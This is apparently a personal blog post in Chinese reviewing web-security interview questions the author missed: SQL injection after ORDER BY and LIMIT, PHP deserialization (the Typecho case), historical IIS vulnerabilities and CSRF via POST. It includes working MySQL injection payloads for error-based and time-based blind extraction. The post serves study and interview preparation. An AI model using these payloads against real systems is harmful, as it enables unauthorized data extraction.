写好简历给朋友内推,然后前几天打电话我面试了,面试都是在电话中进行的,问了许多问题,就记录一下面试中我不会的东西吧。
sql注入中 order by 如何注入
在sql注入中,通常都有order by 3
这样的语句,3
是什么意思呢?如果一个表有三个字段id
username
password
,那么order by 3
相当于 order by password
,如果order by 4
就报错了,因为数据表中没有第四个字段。
其实就是考验sql语法,order by后面跟怎样的语法
如何判断
如何order by后面内容可控,可以用 order by 1/2/3 — 来看看页面是否在变化
获取数据
- 报错:
order by 1 and(updatexml(1,concat(0x7e,(select user())),0))
- 时间盲注:
order by if(1=1,sleep(3),1)
1=1换成数据拼接语句即可
sql注入中 limit后如何注入
https://www.cnblogs.com/Vinson404/p/7246792.html?utm_source=itdadao&utm_medium=referral
- 报错:
LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)
- 时间盲注:
LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)
php反序列使用的函数
- 析构函数
_wakeup
(这个不会)
说下案例
说的是typecho 反序列化的案例,之前看过,但是忘了,情急之下好像说错了….
之前看的时候就有个问题,攻击链为什么那么长,又是调用这个又是调用那个,但是明明反序列化的内容是可以通过cookie得到的,不明白为什么要那样,直接用一个自己写的php类加上_destory
反序列在传入cookie不行吗?当时“不求甚解”,没有仔细研究。我也没有测试过,写这篇文字的时候已经是晚上11点了,明天再看看究竟吧。
更新
今天抽空看了下php反序列化,原来php序列化的时候是将对象/数组存储为文本,只保存了对象等相关信息,反序列化的时候在将这些信息还原。我一直以为反序列化是可以直接执行一段代码。。所以正确的利用方式如果存在反序列化漏洞,还需要找到能够满足反序列执行函数的类来调用。
在typecho
案例中,反序列化导致了$config
这个参数可控,在后面传参数的过程中根据可控内容找到了利用的点。总之就是,反序列化的时候可以控制一个一个类,然后根据这个类的内容进一步利用(类是已经存在的,而不是自由编写的0.0)。
参考
- http://www.freebuf.com/articles/web/167721.html
- https://www.anquanke.com/post/id/155306
IIS有哪些历史漏洞
这个只记得一个iis6.0解析漏洞,其他还真不清楚,如果有kali的话或许可以搜搜,但是没有装,就在t00ls搜搜iis搜到的这些。
- IIS6.0远程命令执行漏洞(CVE-2017-7269)
https://thief.one/2017/03/29/IIS6-0%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2017-7269/
https://www.t00ls.net/viewthread.php?tid=38954&highlight=iis
- iis put
- iis 短文件名
- MS15-034 CVE-2015-1635
http://www.freebuf.com/articles/system/64185.html
csrf能用post吗
当时回答不能,今天看一些资料的时候发现可以构造一个iframe然后用JavaScript模拟提交 (噗~~)